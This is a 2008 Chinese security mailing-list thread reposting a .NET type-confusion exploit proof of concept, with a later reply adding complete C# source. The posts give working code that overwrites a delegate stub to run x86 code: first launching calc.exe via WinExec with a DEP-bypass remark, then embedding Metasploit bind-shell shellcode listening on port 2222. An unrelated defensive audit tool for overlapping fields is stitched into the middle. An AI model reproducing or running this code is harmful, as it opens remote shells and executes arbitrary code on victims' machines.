[zz]Writing a .NET Security Exploit PoC


大风

Sep 15, 2008, 10:59:56 PM
to ph4...@googlegroups.com


Let's start out with some convenient types that allow bit twiddling once we've subverted the type system:

class Union1
{
  internal volatile int i;
  internal volatile int j;
}

class Union2
{
  internal volatile object o;
  internal volatile int[] arr;
}

Now we need a way to get two different references to the same object. This is where the exploit comes in, but since I'm not going to publish an exploit for an unpatched bug, we'll make do with something that works but requires full trust:

[StructLayout(LayoutKind.Explicit)]
struct UnsafeUnion
{
  [FieldOffset(0)]
  internal Union1 u1;
  [FieldOffset(0)]
  internal Union2 u2;
}

static Union1 TypeSystemHole(Union2 u2)
{
  // NOT ACTUALLY A SECURITY HOLE!
  // You need full trust to execute this code.
  UnsafeUnion uu = new UnsafeUnion();
  uu.u2 = u2;
  return uu.u1;
}

Now for the interesting bit, getting some x86 code to execute:

Union1 u1;
Union2 u2 = new Union2();
u1 = TypeSystemHole(u2);

// u1 and u2 now reference the same object,
// meaning that we can now convert arbitrary integer
// into objects or arrays (and v.v.)

ThreadStart del = new ThreadStart(DummyMethod);

// A delegate provides an easy way to call the code we're
// generating. As it turns out, it is also a good way
// to bypass DEP, because the delegate stub is in writable
// executable memory.


u2.o = del;
u1.j = u1.i;
u1.j = u2.arr[2] - 12;

// Make the delegate object accessible via the object[],
// then get the address the delegate points to and make
// it accessible via the object[] reference.

// The x86 code we're creating is:
//
// 6A 05            push 5
// 68 xx xx xx xx   push offset string "calc.exe"
// B8 xx xx xx xx   mov eax,<address of kernel32!WinExec>
// FF D0            call eax
// C3               ret
//

MemoryStream mem = new MemoryStream();
BinaryWriter bw = new BinaryWriter(mem);
bw.Write((byte)0x6A);
bw.Write((byte)0x05);
bw.Write((byte)0x68);
u2.o = Encoding.ASCII.GetBytes("calc.exe\0");
bw.Write(u1.i + 8);
bw.Write((byte)0xB8);
bw.Write(GetProcAddressAny("WinExec"));
bw.Write((byte)0xFF);
bw.Write((byte)0xD0);
bw.Write((byte)0xC3);
bw.Write(0);

// Now that we've created the code, copy it into the delegate
// stub memory area.


byte[] tmp = mem.ToArray();
for (int i = 0; i < tmp.Length / 4; i++)
{
  u2.arr[1 + i] = BitConverter.ToInt32(tmp, i * 4);
}

// Invoke the delegate, which will result in running our
// code, instead of the delegate stub.

del();

The missing piece is GetProcAddressAny. It basically searches memory for kernel32 and looks up the address of the WinExec function.

The full source is available here: http://www.frijters.net/TypeSafetyExploitPoC.cs.txt

Note that this PoC requires full trust and obviously only works on x86, but all the ideas are applicable to x64 as well.

2008-9-13 9:03:01 (W. Europe Daylight Time, UTC+02:00)


[Ph4nt0m] <http://www.ph4nt0m.org/>

[Ph4nt0m Security Team]

<http://blog.ph4nt0m.org/> 刺@ph4nt0m

Email: ax...@ph4nt0m.org

PingMe:

=== V3ry G00d, V3ry Str0ng ===

=== Ultim4te H4cking ===

=== XPLOITZ ! ===

=== #_# ===

#If you brave,there is nothing you cannot achieve.#
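Added example (my own code, not from the post above or from the linked PoC): the ingredient that makes TypeSystemHole possible is an explicit-layout type with two fields at offset 0 where at least one is an object reference. That shape is unverifiable, which is why the post says full trust is required. The audit below walks every type in an assembly and reports exactly that pattern, so a reviewer can flag it before such code is granted full trust. The types SuspectUnion and BenignUnion are constructed here only as test input; the method and class names are mine.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Runtime.InteropServices;

static class OverlapAudit
{
    // Constructed sample with the same field shape as the post's UnsafeUnion,
    // so auditing this assembly produces one finding.
    [StructLayout(LayoutKind.Explicit)]
    struct SuspectUnion
    {
        [FieldOffset(0)] internal object a;
        [FieldOffset(0)] internal int[] b;
    }

    // Constructed C-style union of value types: verifiable, must not be reported.
    [StructLayout(LayoutKind.Explicit)]
    struct BenignUnion
    {
        [FieldOffset(0)] internal int i;
        [FieldOffset(0)] internal float f;
    }

    // Reports every explicit-layout type in asm that places a reference-typed
    // field at the same offset as another field. Such a type is unverifiable,
    // so it can only be loaded by code that already runs with full trust.
    public static List<string> FindOverlappingReferenceFields(Assembly asm)
    {
        var findings = new List<string>();
        Type[] types;
        try
        {
            types = asm.GetTypes();
        }
        catch (ReflectionTypeLoadException ex)
        {
            // Keep whatever did load; a type that failed to load cannot be inspected.
            types = ex.Types.Where(t => t != null).ToArray();
        }

        foreach (Type t in types)
        {
            StructLayoutAttribute layout = t.StructLayoutAttribute;
            if (layout == null || layout.Value != LayoutKind.Explicit)
                continue;

            // Group instance fields by their declared offset. FieldOffset is a
            // pseudo-custom attribute, but reflection still hands it back.
            var byOffset = new Dictionary<int, List<FieldInfo>>();
            foreach (FieldInfo f in t.GetFields(BindingFlags.Instance | BindingFlags.Public | BindingFlags.NonPublic))
            {
                var off = (FieldOffsetAttribute)Attribute.GetCustomAttribute(f, typeof(FieldOffsetAttribute));
                if (off == null)
                    continue;
                List<FieldInfo> list;
                if (!byOffset.TryGetValue(off.Value, out list))
                    byOffset[off.Value] = list = new List<FieldInfo>();
                list.Add(f);
            }

            foreach (KeyValuePair<int, List<FieldInfo>> kv in byOffset)
            {
                // Overlaps made only of value types are ordinary unions; skip them.
                if (kv.Value.Count < 2 || kv.Value.All(f => f.FieldType.IsValueType))
                    continue;
                string fields = string.Join(", ", kv.Value.Select(f => f.Name + ":" + f.FieldType.Name));
                findings.Add(t.FullName + ": reference field overlap at offset " + kv.Key + " (" + fields + ")");
            }
        }
        return findings;
    }

    static int Main(string[] args)
    {
        // Audit the assemblies named on the command line, or this one when none are given.
        IEnumerable<Assembly> targets = args.Length > 0
            ? args.Select(path => Assembly.LoadFrom(path))
            : new[] { typeof(OverlapAudit).Assembly };

        int total = 0;
        foreach (Assembly asm in targets)
        {
            foreach (string line in FindOverlappingReferenceFields(asm))
            {
                Console.WriteLine(line);
                total++;
            }
        }
        // Non-zero exit when anything was found, so it can gate a build or a trust decision.
        return total == 0 ? 0 : 1;
    }
}
```

Run with no arguments and it reports SuspectUnion and stays silent on BenignUnion; pass assembly paths to audit other code. The offsets are read back through Attribute.GetCustomAttribute rather than Marshal.OffsetOf, because the latter is meant for marshalable (unmanaged) layouts and is not the right tool for structs holding object references.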


kj021320

Sep 16, 2008, 8:29:58 AM
to ph4...@googlegroups.com
My test run here doesn't work~~ on VS2005! 云舒~~ try it on your side!


Program_Worker

Sep 16, 2008, 10:25:54 PM
to Ph4nt0m
The test did not pass on VS2008.
> <http://www.frijters.net/TypeSafetyExploitPoC.cs.txt>
>
> Note that this PoC requires full trust and obviously only works on x86, but
> all the ideas are applicable to x64 as well.
>
> 2008-9-13 9:03:01 (W. Europe Daylight Time, UTC+02:00)
>
> [Ph4nt0m] <http://www.ph4nt0m.org/>
>
> [Ph4nt0m Security Team]
>
> <http://blog.ph4nt0m.org/> 刺@ph4nt0m
>
> Email: a...@ph4nt0m.org
>
> PingMe:
> <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=han...
> hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
>
> === V3ry G00d, V3ry Str0ng ===
>
> === Ultim4te H4cking ===
>
> === XPLOITZ ! ===
>
> === #_# ===
>
> #If you brave,there is nothing you cannot achieve.#
>

云舒

Sep 17, 2008, 6:29:23 AM
to ph4nt0m
using System;
using System.IO;
using System.Threading;
using System.Text;
using System.Runtime.InteropServices;

class Union1
{
  internal volatile int i = 0;
  internal volatile int j;
}

class Union2
{
  internal volatile object o;
  internal volatile int[] arr = null;
}

class TypeSafetyExploitPoC
{
  [StructLayout(LayoutKind.Explicit)]
  struct UnsafeUnion
  {
    [FieldOffset(0)]
    internal Union1 u1;
    [FieldOffset(0)]
    internal Union2 u2;
  }

  static Union1 TypeSystemHole(Union2 u2)
  {
    // NOT ACTUALLY A SECURITY HOLE!
    // You need full trust to execute this code.
    UnsafeUnion uu = new UnsafeUnion();
    uu.u2 = u2;
    return uu.u1;
  }

  static void DummyMethod()
  {
  }

  internal static void Main(string[] args)
  {
    Union1 u1;
    Union2 u2 = new Union2();
    u1 = TypeSystemHole(u2);
    ThreadStart del = new ThreadStart(DummyMethod);
    u2.o = del;
    u1.j = u1.i;
    u1.j = u2.arr[2] - 12;
    MemoryStream mem = new MemoryStream();
    BinaryWriter bw = new BinaryWriter(mem);
    BinaryReader reader = new BinaryReader(mem);
    try
    {
      // win32_bind -  EXITFUNC=thread LPORT=2222 Size=344 Encoder=PexFnstenvSub http://metasploit.com
byte[] shellcode = { 0x29, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 0x0e, 0x4b, 0x46, 0x7e, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0xf2, 0x21, 0xad, 0x33, 0xe6, 0xb2, 0xb9, 0x81, 0xf1, 0x2b, 0xcd, 0x12, 0x2a, 0x6f, 0xcd, 0x3b, 0x32, 0xc0, 0x3a, 0x7b, 0x76, 0x4a, 0xa9, 0xf5, 0x41, 0x53, 0xcd, 0x21, 0x2e, 0x4a, 0xad, 0x37, 0x85, 0x7f, 0xcd, 0x7f, 0xe0, 0x7a, 0x86, 0xe7, 0xa2, 0xcf, 0x86, 0x0a, 0x09, 0x8a, 0x8c, 0x73, 0x0f, 0x89, 0xad, 0x8a, 0x35, 0x1f, 0x62, 0x56, 0x7b, 0xae, 0xcd, 0x21, 0x2a, 0x4a, 0xad, 0x18, 0x85, 0x47, 0x0d, 0xf5, 0x51, 0x57, 0x47, 0x95, 0x0d, 0x67, 0xcd, 0xf7, 0x62, 0x6f, 0x5a, 0x1f, 0xcd, 0x7a, 0x9d, 0x1a, 0x85, 0x08, 0x76, 0xf5, 0x4e, 0x47, 0xcd, 0x0e, 0x12, 0xe6, 0xcd, 0x3e, 0x06, 0x15, 0x2e, 0xf0, 0x40, 0x45, 0xaa, 0x2e, 0xf1, 0x9d, 0x20, 0x2d, 0x68, 0x23, 0x75, 0x4c, 0x66, 0x3c, 0x35, 0x4c, 0x51, 0x1f, 0xb9, 0xae, 0x66, 0x80, 0xab, 0x82, 0x35, 0x1b, 0xb9, 0xa8, 0x51, 0xc2, 0xa3, 0x18, 0x8f, 0xa6, 0x4e, 0x7c, 0x5b, 0x21, 0x44, 0x81, 0xde, 0x23, 0x9f, 0x77, 0xfb, 0xe6, 0x11, 0x81, 0xd8, 0x18, 0x15, 0x2d, 0x5d, 0x18, 0x05, 0x2d, 0x4d, 0x18, 0xb9, 0xae, 0x68, 0x23, 0x4e, 0xd0, 0x68, 0x18, 0xcf, 0x9f, 0x9b, 0x23, 0xe2, 0x64, 0x7e, 0x8c, 0x11, 0x81, 0xd8, 0x21, 0x56, 0x2f, 0x5b, 0xb4, 0x96, 0x16, 0xaa, 0xe6, 0x68, 0x97, 0x59, 0xb4, 0x90, 0x2d, 0x5b, 0xb4, 0x96, 0x16, 0xeb, 0x02, 0xc0, 0x37, 0x59, 0xb4, 0x90, 0x2e, 0x5a, 0x1f, 0x13, 0x81, 0xde, 0xd8, 0x2e, 0x99, 0x77, 0x8d, 0x3f, 0x29, 0xf1, 0x9d, 0x13, 0x81, 0xde, 0x2d, 0x2c, 0x1a, 0x68, 0x23, 0x25, 0x13, 0x87, 0xae, 0x2c, 0x2e, 0x57, 0x62, 0x8a, 0xf7, 0xe9, 0x21, 0x02, 0xf7, 0xec, 0x7a, 0x86, 0x8d, 0xa4, 0xb5, 0x04, 0x53, 0xf0, 0x09, 0x6a, 0xed, 0x83, 0x31, 0x7e, 0xd5, 0xa5, 0xe0, 0x2e, 0x0c, 0xf0, 0xf8, 0x50, 0x81, 0x7b, 0x0f, 0xb9, 0xa8, 0x55, 0x1c, 0x14, 0x2f, 0x5f, 0x1a, 0x2c, 0x7f, 0x5f, 0x1a, 0x13, 0x2f, 0xf1, 0x9b, 0x2e, 0xd3, 0xd7, 0x4e, 0x88, 0x2d, 0xf1, 0x9d, 0x2c, 0x81, 0xf1, 0x7c, 0xb9, 0xae, 0x85, 0x1c, 0xba, 0xfd, 0xca, 0x2f, 0xb9, 0xa8, 0x5c, 
0xb4, 0x96, 0x16, 0xe1, 0x85, 0xa6, 0x1e, 0x5d, 0xb4, 0x90, 0x81, 0xde, 0x4b, 0x46, 0x7e };
      bw.Write( shellcode, 0, shellcode.Length );
    }
    catch( Exception e )
    {
      Console.WriteLine( "Write error." + e.Message );
    }
    try
    {
      byte[] tmp = mem.ToArray();
      for (int i = 0; i < tmp.Length / 4; i++)
      {
        u2.arr[1 + i] = BitConverter.ToInt32(tmp, i * 4);
      }
      del();
    }
    catch
    {
    }
  }
}
2008-09-17

云舒

From: Program_Worker
Sent: 2008-09-17 11:24:40
To: Ph4nt0m
Cc:
Subject: [Ph4nt0m] Re: Writing a .NET Security Exploit PoC

ayaREI

Sep 17, 2008, 7:09:24 AM
to ph4...@googlegroups.com
云舒 is impressive, as expected....
According to the guru tankaiha, XX stuff has plenty of vulnerabilities; looks like there's studying to do.

2008/9/17 云舒 <yun...@yahoo.cn>

飞扬天下

Sep 17, 2008, 7:57:12 AM
to ph4...@googlegroups.com
Speechless. You've all moved on to C#, and I'm still on C.

井底之蛙

Sep 17, 2008, 7:41:02 AM
to ph4...@googlegroups.com
How does 云舒 know every language and script... it's a wonder.
Is there anything he doesn't know, heh heh...
----- Original Message -----
From: ayaREI
Sent: Wednesday, September 17, 2008 7:09 PM